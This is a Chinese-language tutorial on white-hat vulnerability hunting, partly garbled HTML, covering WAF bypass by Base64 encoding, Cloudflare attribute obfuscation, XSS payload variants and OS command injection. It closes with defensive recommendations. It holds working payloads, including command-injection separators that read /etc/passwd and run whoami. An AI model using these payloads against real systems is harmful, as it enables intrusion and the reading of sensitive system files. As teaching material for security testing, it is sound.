白帽常用漏洞挖掘技巧详解<\/h1>

目录<\/h2>
编码绕过技术<\/a><\/li>
Cloudflare WAF绕过技巧<\/a><\/li>
XSS绕过技术<\/a><\/li>
编码绕过技术<\/h2>

攻击场景<\/strong>：尝试访问服务器敏感文件被WAF拦截<\/p>
原始请求<\/strong>：<\/p>
url\/?f=etc\/passwd
<\/code><\/pre>

返回403状态码（禁止访问）<\/li>
WAF检测到敏感路径\/etc\/passwd<\/code>并拦截<\/li>
<\/ul>
绕过方法<\/strong>：<\/p>


将\/etc\/passwd<\/code>进行Base64编码<\/p>

原始字符串：\/etc\/passwd<\/code><\/li>
Base64编码结果：L2V0Yy9wYXNzd2Q=<\/code><\/li>
<\/ul>
<\/li>

构造新请求：<\/p>
<\/li>
<\/ol>
url\/?f=L2V0Yy9wYXNzd2Q=
<\/code><\/pre>

返回200状态码（成功）<\/li>
WAF无法识别编码后的敏感字符串<\/li>
<\/ul>
原理分析<\/strong>：<\/p>

WAF通常基于关键词明文检测<\/li>
Base64编码改变了字符串表现形式<\/li>
服务器端可能自动解码或存在解码漏洞<\/li>
<\/ul>
Cloudflare WAF绕过技巧<\/h2>
属性名混淆技术<\/h3>
示例Payload<\/strong>：<\/p>

<\/span><\/span><\/code><\/pre>绕过技巧<\/strong>：<\/p>


大小写混淆<\/strong>：<\/p>

href<\/code> → hrEF<\/code><\/li>
src<\/code> → sRC<\/code><\/li>
onerror<\/code> → oNErrOR<\/code><\/li>
绕过简单的字符串匹配规则<\/li>
<\/ul>
<\/li>

data URI利用<\/strong>：<\/p>

data:x,<\/code> 构造空的图片数据URI<\/li>
确保图片加载失败以触发onerror事件<\/li>
<\/ul>
<\/li>

属性分隔技巧<\/strong>：<\/p>

使用非常规属性如only=1<\/code><\/li>
破坏WAF的模式识别<\/li>
<\/ul>
<\/li>
<\/ol>
其他有效Payload变种<\/h3>
<svg<\/span> onload<\/span>=<\/span>prompt()<\/span>>
<\/span><\/span><iframe<\/span> srcdoc<\/span>=<\/span>""<\/span>>
<\/span><\/span><\/code><\/pre>XSS绕过技术<\/h2>
经典绕过方法<\/h3>


JavaScript伪协议<\/strong>：<\/p>
<a<\/span> href<\/span>=<\/span>"javascript:alert(1)"<\/span>>click<\/a<\/span>>
<\/span><\/span><\/code><\/pre><\/li>

事件处理器<\/strong>：<\/p>

<\/span><\/span><\/code><\/pre><\/li>

SVG标签利用<\/strong>：<\/p>
<svg<\/span> onload<\/span>=<\/span>alert(1)<\/span>>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
高级绕过技巧<\/h3>


编码混淆<\/strong>：<\/p>

<\/span><\/span><\/code><\/pre><\/li>

字符串拼接<\/strong>：<\/p>
<script<\/span>>eval('al'<\/span>+<\/span>'ert(1)'<\/span>)<\/script<\/span>>
<\/span><\/span><\/code><\/pre><\/li>

模板字符串<\/strong>：<\/p>
<script<\/span>>alert<\/span>`1`<\/span><\/script<\/span>>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
OS命令注入案例<\/h2>
基础命令注入<\/h3>
漏洞点<\/strong>：系统调用未过滤用户输入<\/p>
示例<\/strong>：<\/p>
url\/?cmd=ls -la
<\/code><\/pre>
绕过技术<\/h3>


命令分隔符<\/strong>：<\/p>
; cat \/etc\/passwd
& whoami
| id
<\/code><\/pre>
<\/li>

编码绕过<\/strong>：<\/p>
$(printf "%s" "Y2F0IC9ldGMvcGFzc3dk" | base64 -d)
<\/code><\/pre>
<\/li>

环境变量扩展<\/strong>：<\/p>
${PATH:0:1}tmp${PATH:0:1}test
<\/code><\/pre>
<\/li>
<\/ol>
防御建议<\/h2>


输入验证<\/strong>：<\/p>

严格限制允许的字符集<\/li>
使用白名单而非黑名单<\/li>
<\/ul>
<\/li>

输出编码<\/strong>：<\/p>

根据上下文（HTML\/JS\/URL等）进行适当编码<\/li>
<\/ul>
<\/li>

安全配置<\/strong>：<\/p>

禁用危险函数（如eval、system等）<\/li>
设置Content Security Policy (CSP)<\/li>
<\/ul>
<\/li>

WAF规则<\/strong>：<\/p>

更新规则以检测编码攻击<\/li>
实现多层级检测机制<\/li>
<\/ul>
<\/li>

日志监控<\/strong>：<\/p>

记录所有可疑请求<\/li>
设置异常行为警报<\/li>
<\/ul>
<\/li>
<\/ol>
通过掌握这些技术，安全研究人员可以更有效地发现和报告漏洞，同时帮助开发人员构建更安全的应用程序。<\/p>